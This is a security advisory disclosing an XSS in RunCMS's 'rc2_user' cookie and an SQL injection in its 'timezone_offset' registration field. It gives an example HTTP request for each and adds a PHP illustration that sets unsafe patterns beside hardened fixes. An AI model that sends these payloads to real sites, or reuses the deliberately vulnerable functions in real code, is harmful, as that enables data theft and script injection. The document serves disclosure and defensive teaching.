Multiple Vulnerabilities in RunCMS

2011-01-27T00:00:00
ID HTB22820
Type htbridge
Reporter High-Tech Bridge
Modified 2011-01-27T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in RunCMS which could be exploited to perform cross-site scripting and SQL injection attacks.

1) Cross-site scripting (XSS) vulnerability in RunCMS
The vulnerability exists due to an input sanitization error in the "rc2_user" cookie in user.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Exploitation example:
GET /user.php HTTP/1.1
Cookie: rc2_user='><script>alert("XSS")%3b</script>

2) SQL injection vulnerability in RunCMS
The vulnerability exists due to input sanitization errors in the "timezone_offset" parameter in register.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary SQL commands in the application's database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
POST /register.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 299
uname=user3&email=user%40test2.com&user_viewemail=0&name=user3&address=nope&zip_code=123&town=nope&user_from=nope&phone=123&user_avatar=blank.gif&timezone_offset=123'SQL_CODE_HERE&url=http%3A%2F%2Fnope&language=english&passw=password&vpassw=password&user_mailok=1&verify_text=&verify_crc=&keystring=368483&op=finish
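Added illustration (not RunCMS source and not part of the advisory): the two unsafe coding patterns the findings describe, each beside a hardened form. The users table, column names, the $pdo connection and the attribute-context rendering are assumptions made for the example.

```php
<?php
// Illustrative reconstruction, not RunCMS code. Assumes the pdo_sqlite extension.

// 1) Reflected cookie (user.php). The advisory payload '><script>... only
//    works if the raw cookie value is concatenated into an HTML attribute.
function render_user_field_unsafe(string $cookieValue): string {
    return "<input type='text' name='uname' value='" . $cookieValue . "'>";
}

function render_user_field_safe(string $cookieValue): string {
    // Encode for the attribute context; ENT_QUOTES also encodes the single
    // quote, which is the character the payload relies on to break out.
    $enc = htmlspecialchars($cookieValue, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<input type='text' name='uname' value='" . $enc . "'>";
}

// 2) timezone_offset (register.php). Concatenating the string into SQL lets a
//    single quote terminate the literal, as in the advisory's 123'SQL_CODE_HERE.
function insert_user_unsafe(PDO $pdo, array $post): void {
    $sql = "INSERT INTO users (uname, timezone_offset) VALUES ('"
         . $post['uname'] . "', '" . $post['timezone_offset'] . "')";
    $pdo->exec($sql);
}

function insert_user_safe(PDO $pdo, array $post): void {
    // Validate the type first: an offset is a number in a known range, so any
    // other value is rejected before it gets near the database.
    $tz = filter_var($post['timezone_offset'] ?? '', FILTER_VALIDATE_FLOAT);
    if ($tz === false || $tz < -12.0 || $tz > 14.0) {
        throw new InvalidArgumentException('invalid timezone_offset');
    }
    // Then bind it as a parameter so it can never be parsed as SQL.
    $stmt = $pdo->prepare(
        'INSERT INTO users (uname, timezone_offset) VALUES (:uname, :tz)');
    $stmt->execute([':uname' => (string)($post['uname'] ?? ''), ':tz' => $tz]);
}

// Run the hardened functions against the advisory's own payloads.
echo render_user_field_safe("'><script>alert(\"XSS\");</script>"), PHP_EOL;

$pdo = new PDO('sqlite::memory:');
$pdo->exec('CREATE TABLE users (uname TEXT, timezone_offset REAL)');
try {
    insert_user_safe($pdo, ['uname' => 'user3',
                            'timezone_offset' => "123'SQL_CODE_HERE"]);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
insert_user_safe($pdo, ['uname' => 'user3', 'timezone_offset' => '5.5']);
```

The unsafe variants are kept only to show which construction the advisory's payloads depend on; the safe variants reject the SQL payload on validation and neutralize the cookie payload by attribute encoding.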